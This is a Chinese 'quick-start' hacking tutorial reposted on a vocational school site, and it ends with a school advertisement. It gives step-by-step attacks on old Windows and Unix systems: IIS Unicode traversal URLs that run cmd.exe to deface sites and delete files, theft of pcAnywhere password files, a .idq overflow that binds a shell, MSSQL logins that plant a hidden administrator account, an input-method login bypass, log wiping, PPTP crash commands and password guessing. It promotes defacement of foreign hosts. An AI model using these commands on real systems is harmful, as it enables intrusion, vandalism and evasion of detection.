当前位置：湖南阳光电子技术学校 → 文章资讯 → 技术园地 → 电脑维修技术

招生办公室电话：0731-85569651 0731-85579057 全国免费电话：0731-85579057

菜鸟入门速成教程－流行的漏洞入侵

减小字体

增大字体作者：佚名来源：本站整理发布时间：2010-07-29 20:26:33

终于决定要写下这份速成教材了,好让一些正准备步入黑客殿堂的朋友和一些正在步入黑客殿堂的朋友可以很快的找到感觉.因为是速成所以里面的一些理论上的东东会被X掉,大家如果要学的话可以找书看看,以下都是攻击的步骤(不准用在国内的机子上)
1 UNICODE漏洞
这是老漏洞了,但对于新手来说很好用,而且事实证明现在仍有很多的机子有这种漏洞,OK我们开始
先用扫描器扫到有UNICODE漏洞的机子,(注意漏洞的编码方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..当然还有其它的方式, 具体根据你的扫描器扫出的结果为标准
我们在流览器(IE)的地址栏中输入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
这时你可以看到它的系统目录但我们要的是主页面放置的目录
在输入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/inetpub/wwwroot
看到了吧,目录中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主页面,
我们来换它的页面
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe

http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:/inetpub/wwwroot/default.asp
OK
成功了,此时它的主页面被换成了HACKED BY KAWEN
大家可以看看
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe 执行后是复制,如果换成这个呢
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:/winnt/system32/cmd.exe
没错就是删除了
知道怎么做了吧
呵呵

2利用PCANWHERE攻击网站
现在开始入正题了,刚才只是热身
由于NT的机器一般使用PCAnyWhere进行远程管理,因此如果能够得到PCAnyWhere远程连接的帐号和密码,那么就能远程连接到主机。（ http://fxyong.3322.net/getpwd.zip ）便可以取得帐号和密码
Telnet IP 5631
我们可以看看PCANYWHERE开了没
使用Unicode漏洞+ PCanyWhere密码查看工具
首先我们要DOWN一个可以破 Pcanywhere的工具
http://www.symantec.com/
OK 我们现在要找到主机上的*.CIF文件
在IE中输入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:/*.cif /s
一般Citempl.cif为系统默认的密码文件，因此我们需要SA.CIF文件。复制该文件到网站目录下。
需要知道网站目录，可以通过ida,idq漏洞进行得到，也可以去寻找网站中的一个图片文件，比如Tscontent.gif文件，然后去查找该文件：使用命令 dir c:/ Tscontent.gif /s
比如网站目录为c:/inetpub/wwwroot/ 一般都有是啦呵呵
密码文件所在目录：c:/Program Files/pcANYWHERE/DATA
下面执行Copy命令：
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:/Program Files/pcANYWHERE/DATA/SA.CGI c:/inetpub/wwwroot/
显示1 file(s) copied，就表示复制成功了。

使用IE下载该文件
使用 http://IP/sa.cif 就可以下载该文件了。

使用PCanyWhere密码查看工具得到用户名和密码

3利用.idq漏洞　　

为了方便大家可以看懂下面说的是什么可以先到这里来看看
http://snake12.top263.net/IISOverflow/IISOverflow.htm
一共有两个版本.一个是GUI版本.一个是命令行版本.
这里我们来说CUI版本,反正都差不多了,关键是要多试
首先我们要找到有.IDQ漏洞的机子,可以用流光扫一下
运行软件
在被攻击IP地址后面写上对方的IP.端口号一般不需要改动.
左面选择操作系统类型.先选择IIS5 English Win2k Sp0吧~
软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~
点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了.
接着我们用NC,你可以到到盟下载 WWW.CNHONKER.COM
C:/>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:/WINNT/system32>

OK!!!上来了
你现在有SYSTEM权限,不错吧,该做什么不用我教了吧,比如为自已留下个后门
net user hacker password /add '添加一给名为hacker，密码为passwod的用户！
net localgroup administrators hacker /add ' 把刚才创建的用户加入 Admnistrators组
OK我们在来看看DOS版本
下载软件后会有个运行文件,它太长了,将它必名为KAWEN
D:/>KAWEN
运行参数: 操作系统类型目的地址 web端口溢出端口
支持的操作系统类型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2

D:/>KAWEN 3 XXX.XXX.XXX.XXX80 456
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在，你可以连接该主机的端口 456了,good luck.!

开始吧
D:/>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK

没成功.试试sp1.
D:/>KAWEN 4 XXX.XXX.XXX.XXX 80 888
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在，你可以连接该主机的端口 888了,good luck.!
D:/>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:/WINNT/system32>
看看我们又成功了

4 SQL攻击网站
这个也很方便,呵呵,上次在对美国大战中也有不少兄弟是用这种方法的,来看看吧
我们需要小榕的流光作为武器,到WWW.NETEYES.COM去DOWN一个
运行流光然后按快捷键ctrl＋r搜索！
选择aql！输入开始和结束的IP！扫描吧！到搜索结束！察看流光下面的视图！格式如下：
用户名密码地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密码为空！
双击其中一项（或在工具……>SQL登录）！会弹出一个dos窗口！如果过一会该窗口消失！没戏了！对方不支持远程登录！在换一个！如果过一会出现如下的字样：
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已经登录上了对方的主机！然后
SQLCmd>net user ‘察看用户！如果不能察看，说明sa权限不够，那也没戏，换其他的方法！或是走人！有时用net user察看成功！再试试
SQLCmd>net user administrator ’察看Admin的情况（可知是否在线）如果失败，撤退吧，
没戏，换方法！没有权限,但是如果可以的话
下一步：
SQLCmd>net user hacker password /add '添加一给名为hacker，密码为passwod的用户！
SQLCmd>net localgroup administrators hacker /add ' 把刚才创建的用户加入 Admnistrators组

好了，告一段落，下面启动DOS用刚创建的用户进行ipc$
net use //*.*.*.*/ipc$ "password" /user:"hacker" '很熟悉吧！IPC$开始了！
执行成功的话！搞吧！删除！上传！下载！要什么！随你！
例如copy c:/hacker/index.htm //IP/c$/inetpub/wwwroot/default.htm (IP为它的IP)
干什么，换他的主页啊！呵呵！

据我的实践！针对台湾的主机！另一方法是用刚创建的用户名和密码用CuteFtp登录！就象管理自己的站点一样！任意删除创建Html页面！此方法对美国的主机没有成功过！我都是IPC$搞定的！

以上的原理是用SQL开门！用IPC$进门做作administrator可以作的事！但对于SQL主机！Administrator一般没有对数据库删除或创建的权限！此时可以down下他的sam文件解密(怎么DOWN?晕,看看我在上面UNICODE中写的教材)！默认用户名SQLAgentCmdExec，然后用天行的SQlBrowse登录就可以对数据库任意操作了！

5 利用输入法漏洞
要说老美真不是东西,这么大个洞现在还尚存人间,也好,大家可以练练手
1、用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。

　 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。

　 3、出现windows2000的登陆窗口，按下CTRL+SHIFT键，出现全拼输入法。

　 4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"选项"按右键。

　 5、选择"跳转到URL"，输入：c:/winnt/system32/cmd.exe.

　 6、选择"保存到磁盘"。

　 7、选择目录：c:/inetpub/scripts/

　 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:/ （知道了吧）

　 9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:/inetpub/wwwroot/default.asp

还有一种方法
1.扫描 3389 port 终端服务默认；
2.用终端客户端程序进行连接；
3.按ctrl+shift调出全拼输入法（其他似乎不行），点鼠标右键（如果其帮助菜单发灰，就赶快赶下家吧，人家打补丁了），点帮助，点输入法入门；
4.在"选项"菜单上点右键--->跳转到URL"，输入：c:/winnt/system32/cmd.exe.（如果不能确定NT系统目录，则输入：c:/ 或d:/ ……进行查找确定）；
5.选择"保存到磁盘" 选择目录：c:/inetpub/scripts/，因实际上是对方服务器上文件自身的复制操作，所以这个过程很快就会完成；
6.打开IE，输入： http://ip/scripts/cmd.exe?/c dir 怎么样？有cmd.exe文件了吧？这我们就完成了第一步；
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下：

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL"，输入：c:/inetpub/scripts/go.bat --->在磁盘当前位置执行；
12.呵呵，大功告成啦，这样我们就激活了服务器的geust帐户，密码为：elise，超级用户呢！（我喜欢guest而不是建立新帐户，这样似乎不易被发现些），
后一定别不记的X掉自已的脚印
del+C:/winnt/system32/logfiles/*.*
del+C:/winnt/ssytem32/config/*.evt
del+C:/winnt/system32/dtclog/*.*
del+C:/winnt/system32/*.log
del+C:/winnt/system32/*.txt
del+C:/winnt/*.txt
del+C:/winnt/*.log

6 教你DoS攻击微软的PPTP
呵呵,大家没有看错,的确是微软的,我们先看看PPTP是个什么东东PPTP(Piont-to-point Tunneling Protocol 点对点传输协议)是一个用以建立VPN的网络协议. 此协议需TCP(端口1723)和GRE以完成工作.
易收攻击系统：
* Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0

安全的系统：
* HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
* Dell Latitude CPx with 3Com 3CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
* Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0

如何实现：
~~~~~~~~~
*需要的工具*
1.UNIX box(例如linux,*bsd....)
2.netcat ( http://www.l0pht.com/~weld/netcat/ )
3.apsend ( http://www.elxsi.de/ )
4.ipsend ( http://coombs.anu.edu.au/~avalon/ )

OK,这就好说了,
我们来看它的三个BUG
1 TCP端口1723
此弱点只在prior至SP6的机器上有效。并不是所有的机器都存在这个漏洞；请在Unix 操作系统内键入以下：
$ nc 1723 < /dev/zero

如机器存在此漏洞, 目标主机将在几秒种之内蓝屏，并有如下错误：
STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
再次提醒，此弱点只对部分机器有效

2 GRE
此弱点对所有Service pack有效
在目标机器上，打开任务管理器选择“运行”。并打开一个DOS窗口（开始-运行-CMD).在Unix类操作系统上：
$ apsend -d --protocol 47 -m 0 -q
在目标主机上你将看到任务管理器内内核记忆的数字将缓慢上升。终，这些数字将停止增加；此时， CPU在一段时间内有可能被占用。现在你可以试着在命令提示符后键入一个命令例如DIR,这时你将看到一个信息说提示操作系统已不可能完成要执行的命令

3弱点三：GRE
此弱点同样对所有的Service pack有效。请在Unix操作系统上：
#!/bin/csh
foo:
ipsend -i -P gre > /dev/null
goto foo
目标主机很快会蓝屏，大概需要50个数据。
明白了吧

7 UNIX攻击
这里为了方便我们用finger 0@ip 来找UNIX的薄弱机器
C:/>finger 0@IP
xxx.xxx.xxx.xxx]

daemon ??? < . . . . >

bin ??? < . . . . >

sys ??? < . . . . >

jeffrey ??? pts/0 203.66.149.11

daniel ??? 437 114cm.kcable.

jamie ??? 0 203.66.162.68

postgres ??? pts/2 203.66.162.80

nsadmin ??? 768 203.66.19.50

ho ??? 390 61.169.209.106

house18 ??? pts/1 203.66.250.1

tong ??? pts/0 210.226. 42.69

jliu ??? pts/0 203.66.52.87

ptai ??? < . . . . >

看到了吗,这里的LOGIN下的就是我们要的用户名了
比如jeffrey,Daniel,Jamie,postgres
下面我们就来入侵
C:/>telnet xxx.xxx.xxx.xxx
一般的情况下我们都是猜密码,怎么猜??就是上面LOGIN下的用户名让它又做用户名和密码呀,事实上总有一些人为了方便是这么设置的
login: ptai （***输入用户名***）

Password: **** （***输入密码***）

Password:

$ login: tong

Password:

Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 （***这个用户上次登陆时的IP***）

Sun Microsystems Inc. SunOS 5.6 Generic August 1997

You have mail. (***HOHO~登陆成功啦***)
看看这不就进来了
$ uname –a (***查看系统版本和补丁信息***)
$ set (***查看一些系? 　　湖南省阳光电子技术学校常年开设：手机维修培训、家电维修培训、电工培训、电脑维修培训、焊工培训--面向全国火爆招生！网址：http://www.hnygpx.com 报名电话：0731-85579057)。安置就业。考试合格颁发全国通用权威证书。采用我校多年来独创的“模块教学法”,理论与实践相结合、原理＋图纸＋机器三位一体的教学模式，半天理论，半天实践，通俗易懂，确保无任何基础者也能全面掌握维修技能、成为同行业中的佼佼者。工作(一期不会，免费学会为止)。